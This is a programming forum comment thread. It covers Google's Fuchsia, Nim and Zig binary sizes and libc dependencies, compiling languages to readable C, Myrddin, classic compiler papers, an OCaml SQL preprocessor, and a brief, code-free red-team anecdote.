                                                                      I’ll still give the final product a fair shake, regardless, though. I look forward to seeing what they come up with.

                                                                      1. 2

                                                                        totally agreed re: Google; I also have concerns about some of the items I’ve seen such as this, which discusses systems within Fuchsia that could be used for adverts, as well as Google’s tendency to do something cool and then drop it.

                                                                        Also, re: Shapiro: I think he’s interesting, but I also (having dealt with him on the mailing lists) wonder about his ability to produce, since Coyotos/EROS/and-so-on were largely embryonic (at best).

                                                                        1. 2

                                                                          re Google. They’re an ad company. Assume the worst. I even assumed Android itself would get locked up somehow over time where we’d loose it, too. Maybe with technique like this. Well, anything that wasn’t already open. We’re good so long as they open source enough to build knock-off phones with better privacy and good-enough usability. People wanting best-in-class will be stuck with massive companies without reforms about patent suits and app store lock-in.

                                                                          re Shapiro. He was a professional researcher. Their incentives are sadly about how many papers they publish with new, research results. Most don’t build much software at all, much less finish it. He was more focused than most with the EROS team having running prototype they demo’d at conferences. Since he’s about research, he started redoing it to fix its flaws instead of turn it into a finished product. They did open-source it in case anyone else wanted to do that. I’m not sure whether these going nowhere says something about him, FOSS developers’ priorities, or both. ;)

                                                                          1. 2

                                                                            Completely agreed re: Google. I don’t even disagree re: Shapiro either, but I’ll add one comment: I looked at the source code for EROS/Coyotos/BitC such that they were… it wasn’t something you could just dive into. Describing it as “hairy” and “embryonic” is about as kind as I can be for someone who has been awake since 0300 local.

                                                                            1. 2

                                                                              Thanks for the tip. Yeah, that’s another problem common with academics. It’s why I don’t even use stuff with great architecture if they coded it. I tell good coders about it hoping they’ll do something like it with good code. For some reason, the people good at one usually aren’t good at the other. (shrugs) Then you get those rare people like Paul Karger or Dan Bernstein that can do both. Rare.

                                                                              1. 2

                                                                                so Bernstein’s father was one of my professors in college; definitely an interesting fellow… I can see at least why he has practical chops, since his father is a very practical (if nitpicky) coder himself.

                                                                                1. 2

                                                                                  That’s cool. I didn’t know his dad was a programmer. That makes sense.

                                                                    2. 1

                                                                      I never understood why NaCl didn’t take off. I loved that framework.

                                                                      1. 1

                                                                        I was never sure about that myself. A few guesses are:

                                                                        1. It’s hard to get any security tech adopted.

                                                                        2. Chrome was still having vulnerabilities. Might have been seen as ineffective.

                                                                        3. Couldve been a burden to use.

                                                                        4. Other methods existed and were being developed that might be more effective or usable.

                                                                    3. 3

                                                                      Unfortunately Google never accepted those changes :(

                                                                    1. 0

                                                                      You have a binary that is fast (2 ms), small (107 kB) and dependency-free.

                                                                      Ya, that’s true because nim compiles to c! Then it compiles to a binary by using gcc or clang (for example).

                                                                      So it’s not actually dependency free… you’ll need a unix environment at least to provide stdout/in IO.

                                                                      Nevertheless it’s interesting – although I haven’t had the impression that it’s quite that unknown… I believe I heard about it the first time somewhere around 2014. Although I’ve never used it myself, I’ve always seen articles about it from time to time.

                                                                      1. 6
                                                                        $ nim c hello.nim 
                                                                        Hint: used config file '/nix/store/ab449wa2wyaw1y6bifsfwqfyb429rw1x-nim-0.18.0/config/nim.cfg' [Conf]
                                                                        Hint: system [Processing]
                                                                        Hint: hello [Processing]
                                                                        CC: hello
                                                                        CC: stdlib_system
                                                                        Hint:  [Link]
                                                                        Hint: operation successful (11717 lines compiled; 2.748 sec total; 22.695MiB peakmem; Debug Build) [SuccessX]
                                                                        $ ./hello 
                                                                        Hello, world!
                                                                        $ ldd hello
                                                                        	linux-vdso.so.1 (0x00007ffe06dd1000)
                                                                        	libdl.so.2 => /nix/store/fg4yq8i8wd08xg3fy58l6q73cjy8hjr2-glibc-2.27/lib/libdl.so.2 (0x00007f4a0c356000)
                                                                        	libc.so.6 => /nix/store/fg4yq8i8wd08xg3fy58l6q73cjy8hjr2-glibc-2.27/lib/libc.so.6 (0x00007f4a0bfa2000)
                                                                        	/nix/store/fg4yq8i8wd08xg3fy58l6q73cjy8hjr2-glibc-2.27/lib/ld-linux-x86-64.so.2 => /nix/store/fg4yq8i8wd08xg3fy58l6q73cjy8hjr2-glibc-2.27/lib64/ld-linux-x86-64.so.2 (0x00007f4a0c55a000)
                                                                        $ ls -hal hello
                                                                        -rwxr-xr-x 1 andy users 185K Sep 22 15:53 hello
                                                                        

                                                                        This depends on libc and a runtime dynamic linker. If you built this on your machine and sent me this binary I wouldn’t be able to run it because NixOS has a non hard-coded dynamic linker path.

                                                                        Can’t help but do a comparison here…

                                                                        $ time zig build-exe hello.zig 
                                                                        real	0m0.309s
                                                                        user	0m0.276s
                                                                        sys	0m0.035s
                                                                        $ ./hello 
                                                                        Hello, world!
                                                                        $ ldd hello
                                                                        	not a dynamic executable
                                                                        
                                                                        $ ls -ahl hello
                                                                        -rwxr-xr-x 1 andy users 390K Sep 22 16:01 hello
                                                                        
                                                                        1. 2

                                                                          I’ll be honest and say that I don’t know how to achieve this using C off the top of my head, but I’m willing to be that it is possible. If it’s possible in C, it’s also possible in Nim.

                                                                          Please keep in mind that Nim links with libc dynamically by default, there is nothing stopping you from statically linking libc into your executables if you so wish.

                                                                          1. 1

                                                                            But will they still be as small?

                                                                            1. 2

                                                                              Of course not. But then I also don’t really care about binary sizes, as long as they’re not ridiculously large.

                                                                        2. 1

                                                                          I think that’s a pretty silly definition of dependency free

                                                                          1. 4

                                                                            I guess it depends on your perspective, but it does seem like an extremely pedantic definition. In that case, every Unix C program is dependent on a libc and Unix kernel… but generally we don’t talk about dependencies like that.

                                                                            I will say this tho: I wish languages like nim & zig focused more on tree shaking to get down to the size of C, or as close as possible. Would help in other environments, such as the embedded space, and would be generally better for all.

                                                                            1. 2

                                                                              I wish languages like nim & zig focused more on tree shaking to get down to the size of C, or as close as possible. Would help in other environments, such as the embedded space, and would be generally better for all.

                                                                              Do you have an example of how Zig doesn’t do this?

                                                                              1. 1

                                                                                (edit also I apologize for the late reply, I’m on client site this week)

                                                                                it’s been a while since I last built Zig (I use a local Homebrew, so I ended up having to manually link LLVM and Clang, which wasn’t bad once I figured out how to do so), but even the example displayed above was 390K, so potentially large parts of the Zig RTS is included therein. I think Zig is probably the best of the bunch (I’ve recommended several clients to look into it as part of their roadmap for future embedded projects!), but I do think some room for improvement wrt what’s included could be made.

                                                                                As an aside, I thought I’d try and see if Zig was included in Homebrew now, but the build is dying:

                                                                                [ 65%] Built target embedded_softfloat
                                                                                make[1]: *** [CMakeFiles/embedded_lld_elf.dir/all] Error 2
                                                                                make: *** [all] Error 2
                                                                                
                                                                                1. 2

                                                                                  There are a few things to know about the size of the above example. One is that it’s a debug build, which means it has some extra safety stuff in there. It even has a full debug symbol parsing implementation so that you get stack traces when your program crashes. On the other hand, if you use --release-small then you get a 96KB executable. (Side note - this could be further improved and I have some open bug reports in LLVM to pursue this.) The other thing to note is that the executable is static. That means it is fully self-contained. The nim version (and the equivalent C version) dynamically link against the C runtime, which is over 1MB.

                                                                                  So the Zig runtime is smaller than the C runtime.

                                                                                  I recommend to wait 1 week until zig 0.3.0 is out before trying to get it from homebrew. The Zig PR to homebrew had llvm@6 in it, to prevent this exact problem. They rejected that and said we had to drop the @ suffix. So naturally it broke when llvm 7 came out.

                                                                                  1. 1

                                                                                    Oh I realized that Zig was statically linked, but I did not realize that it had no further dependency on libc; that’s pretty interesting. Zig has been on my radar since I first caught wind of it some time ago (I enjoy languages & compilers, it’s part of my job & my hobby), but it’s interesting to see no further links!

                                                                                    Previously I fought with getting Zig built out of git directly; the fighting was mostly surrounding linking to LLVM deps in Homebrew, because the two didn’t seem to like one another. Once it was working tho, it was pretty sweet, and I used it for some internal demos for clients. I’ll certainly wait for 0.3.0, it’ll be neat to see, esp. given the new info above!

                                                                                    1. 2

                                                                                      As of this morning 0.3.0 is out! And on the download page there are binaries available for Windows, MacOS, and Linux.

                                                                                      1. 2

                                                                                        Trying it now, and thank you so much! It runs right out of the box (which is so much easier than fighting with a local homebrew install) on Mojave!

                                                                            2. 1

                                                                              My point is that it couldn’t be executed in a Windows or Plan 9 environment. When people like saying the only IDE they need is Unix, it’s worth pointing out that that means they don’t only need a specific program, but a whole OS – and that’s a dependency in my eyes.

                                                                              1. 1

                                                                                WSL exists and Plan 9 is an irrelevant research operating system. Something that depends on POSIX is depending on the portable operating system standard. It’s the standard for portable operating systems. It’s a standard that portable software can rely on existing on every operating system. If your operating system doesn’t support POSIX then you have no right to complain that software isn’t ported to it, IMO.

                                                                                You don’t need a particular OS, you need any OS out there that implements POSIX, which is all of them in common use.

                                                                                1. 1

                                                                                  I don’t care about rights, and that’s not what I meant. I understand your point, but I wanted to say was that the way the author phrased it made me hope (naively, maybe) that there was some actual technology behind Nim that makes it OS independent (since, as I’ve already said, I think a OS is a dependency, regardless of which standards may or may not exist).

                                                                          1. 3

                                                                            I think compile to ‘readable’ C would be a good choice for a lot of projects. It would make using a less mainstream language waaaay less risky.

                                                                            1. 4

                                                                              I think interoperability with C is much more important than generating readable C. You’re generally not going to be interacting with the generated code, but it should be easy to link against it from C and vice versa. You get the same risk mitigation either way.

                                                                              I found generating “readable” C to be tricky, since it’s such a simple language and has no namespacing.

                                                                              1. 3

                                                                                For adoption, my default recommendation now is using C’s types, its calling conventions, automatically recognizing its libraries in FFI, and compiling to readable C. Better to be using the C ecosystem than competing with it entirely.

                                                                                1. 4

                                                                                  For adoption, my default recommendation now is using C’s types, its calling conventions, automatically recognizing its libraries in FFI, and compiling to readable C.

                                                                                  I’ve focused on that in my last two compilers, it’s pretty fun to ship code to clients who don’t even know you’re writing in something else.

                                                                                  1. 2

                                                                                    Yeah. I used to do it with an enhanced BASIC. They were talking about me using a “real” language. Lulz.

                                                                              1. 3

                                                                                myrddin is such a fun language, I encourage everyone to give it a try.

                                                                                1. 1

                                                                                  have you written anything major in it? I like the fact that it supports most of the platforms I use, but I haven’t seen much written in it…

                                                                                  1. 2

                                                                                    I wrote the C compiler mentioned in that post and a few command line utilities like https://github.com/andrewchambers/ddmin . The compiler code was probably the biggest thing I wrote.

                                                                                    1. 1

                                                                                      oh that’s beautiful, thank you! Are there any pain points you’ve experienced with using it?

                                                                                      1. 3

                                                                                        Not much pain really, just a small project so you can’t expect too many libraries and be patient with the docs and help fix them if you can.

                                                                                1. 3

                                                                                  I didn’t know about this one. Thanks!

                                                                                  They cite the folks in FLINT group that I assumed invented the optimizing part. Turns out they may have invented type-based, then this team did optimizing, and people went from there. Those publications are here with stuff this paper cites on the bottom since it’s older. For those interested in verified compilers, I also cited this kind of work in some discussions since they applied type-driven compiler to that. Example is Type-Based, Certifying Code (slides) that builds on Necula’s Proof-Carrying Code (see Bibliography).

                                                                                  1. 2

                                                                                    I didn’t either! Like you, I had seen the others, but I hadn’t seen this one, and stumbled upon it this morning. I was looking for Lucacardelli’s Compiling a Functional Language and Amber paper and found this.

                                                                                    1. 4

                                                                                      I’m still not convinced Luca Cardelli isn’t three geniuses in a trench coat. The amount of research output from that one person is incredible.

                                                                                      Same with Peyton-Jones.

                                                                                      1. 2

                                                                                        Im with you on that. I didnt want to waste his time tagging him in anything less than Modula-4 or a Rust killer. ;)

                                                                                  1. 3

                                                                                    what’s the date on this?

                                                                                    1. 3

                                                                                      looks like it’s from 1996

                                                                                      1. 2

                                                                                        what’s the date on this?

                                                                                        What, you don’t think the DEC Alpha is a modern, relevant architecture? /s

                                                                                        1. 1

                                                                                          Funny enough, the folks at crash-safe.org built their first prototype as an Alpha. I was like, “Huh? Couldnt it be something that wasnt buried by Intel and Fujitsu?”

                                                                                        2. 1

                                                                                          looks like 1996 or so, based on which ACM journal it was going to hit.

                                                                                        1. 3

                                                                                          I have many times, mainly for purposes of program synthesis.

                                                                                          I think it’s quite useful, esp. if you’re iterating on a problem, and looking for someway to describe that problem naturally, without having to think about implementation details.

                                                                                          1. 2

                                                                                            Sounds interesting, can you share any more details about this work?

                                                                                            1. 3

                                                                                              absolutely! I work as “red team” (previously in adversary simulation, currently in more technical correctness types of situations), so very often I’m presented with:

                                                                                              1. some set of “things” I need to “do” (API calls native or web, some format I need to construct, some code I need to generate many copies of with minor variance, what-have-you)
                                                                                              2. a system that I’m not supposed to be on with limited tooling (“living off the land”)
                                                                                              3. with a large amount of repetition

                                                                                              so often the easiest way is to simply write something in a simpler format that generates the steps above so that attack chains can be more easily constructed.

                                                                                              A simple example was that I had Remote Code Execution on a host via two languages (one was the platforms scripting language, the other was native Unix/Windows shell), but only 100 characters at a time (as they were packed in images, with no bindings to Python). So, rather than attempt to write a Python binding or fight with make a generic system using the libraries provided, I:

                                                                                              1. wrote a simple description format (creds, commands to be run, host, &c)
                                                                                              2. wrote a compiler to the long horrible chain of things I just described that produced “ok” C
                                                                                              3. delivered that to team + client for proof of concept

                                                                                              it’s a weird example of basically partial evaluation, but it works for me, and is usually easier for me to digest than attempting to get all the moving pieces in one go.

                                                                                          1. 5

                                                                                            After using Yesql and HugSQL in Clojure I liked the approach so much, we ended up building a similar solution in OCaml, where we have a PPX that just generates all the annoying boilerplate required to run SQL queries and exposes a type safe interface to it. It is not an ORM so it is very clear how the code maps to SQL and it is also rather simple to implement, without having to worry about impedance mismatch. Of course it doesn’t handle migrations or the like but these are outside of the scope of the system.

                                                                                            Initial impressions from internal users were enthusiastic.

                                                                                            1. 1

                                                                                              we ended up building a similar solution in OCaml

                                                                                              that sounds interesting; has it been released anywhere?

                                                                                              1. 2

                                                                                                It is a very early release and I expect there will still be a number of changes which is why we haven’t submitted it to OPAM yet, but you can check out ppx_mysql.

                                                                                                In spirit it is similar to PG’OCaml, but PG’OCaml talks to Postgres on compile time and MySQL can’t do that and also I prefer not to require talking to external services when building so all the type information has to be specified manually.

                                                                                                1. 1

                                                                                                  oh interesting, I’ll definitely check this out! The idea sounds intriguing, and I enjoyed working with PG’OCaml previously, for what little I had to do with it. Thank you very much!

                                                                                            1. 3

                                                                                              this is bait. do not execute a random obfuscated python script.

                                                                                              1. 2

                                                                                                oh ja, that’s for sure. Don’t execute random anything, but the style is definitely written to mimic the various tools we see in the space at the very least.

                                                                                                I think my fav comment to this was responding to the “my ssh tool is too dangerous to release” thing; definitely going for the “we have an internet badass over here” direction, even if unintentionally.

                                                                                                1. 2

                                                                                                  It’s odd, the author says that the tool is too dangerous to release but then they released it anyway

                                                                                                  1. 1

                                                                                                    in the past that was often done for “cred,” to make things look more bad ass than they actually were. Here I have no idea, but it came across as silly to me.